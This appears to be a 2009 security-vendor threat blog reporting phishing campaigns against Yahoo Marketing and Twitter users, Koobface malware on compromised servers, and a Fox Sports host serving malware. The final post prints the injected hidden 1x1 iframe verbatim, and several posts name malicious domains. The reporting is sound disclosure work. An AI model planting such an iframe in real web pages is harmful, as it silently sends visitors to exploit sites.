Friday, October 23, 2009

Phishing Criminals Take Aim at Yahoo Ad Services

Yahoo! Marketing users are the target of a new phishing scam being detected today by the eSoft Threat Prevention Team. Webmasters receive a very believable notification that their Yahoo Marketing account has expired with a link to login and presumably reactivate the account.

If the user follows the link, they’re presented with an authentic looking login page where the phishing attack takes place. The username and password entered here are delivered to the attackers for further exploitation. With these credentials, criminals can hijack paid advertisements, replacing legitimate ads with their own malicious links or code.







The “hook” in this scam is a classic warning of impending account closure.  The domain being used to serve the phishing attack was registered only today, but has an authentic ring to it. The URLs also use a marketingsolutions.yahoo subdomain to make the URL seem more authentic.




At the time of detection, none of the major search engines or public phishing lists detected this URL as malicious.

Wednesday, October 21, 2009

Compromised Web Servers Host Koobface Malware Cocktail

The Koobface gang has struck again using compromised web servers to deliver a potent mix of malware. eSoft threat researchers have found hundreds of newly exploited sites hosting malware which includes downloaders, keyloggers and multiple variants of the Koobface worm.

Attackers using compromised sites to deliver their malware stand a better chance of evading web filters since those sites are generally already categorized in a "safe" category. The constant changing of the malware binaries also keeps the Anti-Virus detection rates low.



 eSoft has noted a constant stream of new malware files coming from these sites.

Koobface is a social network worm that spreads using social engineering techniques. Users will typically receive a link to an alleged video. After clicking the link, the user is prompted to update their flash player or download a codec to view the video. Users who haven't been trained to be skeptical of such requests follow the directions, infecting their machine and allowing the worm to spread through available social networks using the local users' accounts and targeting the infected users friends, family and business contacts. This social networking aspect is part of the lure of the social engineering and why its so successful. The video might require a download to view, but it came from a close friend so it is probably fine.

The keyloggers hosted on the compromised sites can be used to steal any kind of sensitive personal information. Koobface will often steal login credentials for social networking sites which it can then use to send more messages and infect more machines.

The compromised sites in this attack are in a format that looks something like this:








eSoft is flagging these sites as 'Compromised'.

Friday, October 16, 2009

Unresolved Compromised Fox Sports Host Heading Into Third Week

eSoft first detected a compromise on the Fox Sports website two weeks ago and as of today, at least one Fox Sports host continues to contain automatic links to a multitude of dangerous exploits. Even with media coverage and direct emails, this compromised host has not been taken offline or cleaned. The threats being hosted have rotated with the most recent threats being remote script links to ackworld.com and nt002.cn.

akcworld.com has been hosting a multitude of Gumblar exploited pages that are leading to dangerous trojans.


nt002.cn has been hosting a variety of exploits, most recently targeting the Microsoft Video Control ActiveX vulnerabilities.



We hope that with further attention and pressure, the Fox Sports administrators will address this problem before another week passes.

Wednesday, October 14, 2009

Fresh Twitter Phishing Campaign via Direct Messages and Tweets

A fresh twitter phishing campaign is underway and using both tweets and direct messages to spread. The messages contain text such as “hah, I think I seen u on here” and “wow you look different on here” together with a link to a video. The URL hxxp://videos.dskjkiuw.com is one of the ones being used. At this time, eSoft is not detecting malware or exploits on this domain, but the target page presents a good imitation of the twitter login page in an attempt to steal credentials. As such, eSoft has flagged it as “Phishing & Fraud.” The Threat Prevention Team will keep a close eye on developments. Below is a series of screenshots starting with an example direct message and leading to the fake login page and the series of pages that come up after entering bogus username and password info.















































Wednesday, October 7, 2009

Update on Fox Sports Website Infection

Quick update on this threat: as of today, 10/7/09, the Fox Sports website is still compromised. The specific URL, hxxp://msndr.foxsports.com/, has been cleaned, but any added nonsensical path results in a 404 page with the malicious iframe to thingre.com. For example, the hxxp://msndr.foxsports.com/dffdd results in a malicious page leading visitors to malware. eSoft has not received any response from Fox Sports and the classification of the msndr.foxsports.com host remains "Compromised."

Monday, October 5, 2009

Millions At Risk Visiting Popular Sports Site

The Fox Sports website remains infected and a risk to the 6m+ visitors ([popularity data] as reported by Compete). This website, ranked as the 75th most popular website in the United States and 311th most popular in the World according to Alexa [populartiy data] remains compromised and a major security risk to end-users. eSoft first reported on this threat on Friday, October 2nd, but was incorrect in saying that the infection was cleaned up. [Clarification: the specific pages eSoft examined were cleaned, but other pages have been discovered to still be compromised.] As of today, certain pages on the Fox Sports site remain infected. The eSoft team has written to the webmaster at Fox Sports (along with all contacts listed in their whois records) with some details that we hope will help their team clean up the website. When we hear back from them, we will post so here.

Note that the malware being delivered through this threat remains undetected by the vast majority of anti-virus software. Also note that the compromised pages are being served through the Akamai network although at this time we believe the threat is specific to Fox Sports and not Akamai. Here is part of the email sent to Fox Sports by the eSoft team:

To Whom It May Concern:

eSoft has detected that your website, msndr.foxsports.com, remains infected with a dangerous, hidden iframe that links to a site that uses a variety of exploits to infect your website visitors with one of several rotating trojans. In particular, your 404 Page Not Found page on that server has the iframe right at the end of the HTML document immediately before the </body> tag. See attached screenshot. Unfortunately, eSoft cannot say how your site was compromised, only that it is compromised and the compromised pages are being served through your Akamai distribution network. At this time, eSoft has marked msndr.foxports.com as a Compromised site and millions of end users are currently blocking access to the site based on that determination. Please let us know when you have corrected the issue so that we may unblock your site.


foxsports.thingre.infection.png

Friday, October 2, 2009

Foxsports.com Used to Serve Malware

eSoft's Threat Prevention Lab detected malicious code on the foxsports.com website late yesterday. Hackers have once again increased their tally of well known websites recently exploited to serve dangerous content.

The popular sports website was used to transparently redirect users to a dangerous site that regularly hosts malware. The compromised page contained a hidden iframe that retrieved content from the malicious site.

The URL used for the attack was part of the Fantasy Baseball Hot Streak game. Hot Streak Fantasy Baseball users should check their machines for any signs of infection or malicious activity.



The URL hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external/ contained the hidden iframe below, accessing content at hxxp://thingre.com/in.php.

<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

The redirect domain thingre.com has a poor reputation, not only with eSoft but also with Google, Web of Trust and multiple URL blocklists.



The page can no longer be viewed on the Fox Sports website, and the file on the malicious site has been removed. The last malware known to be hosted at the site was a trojan.dropper variant and the payload delivered last night is assumed to be more of the same.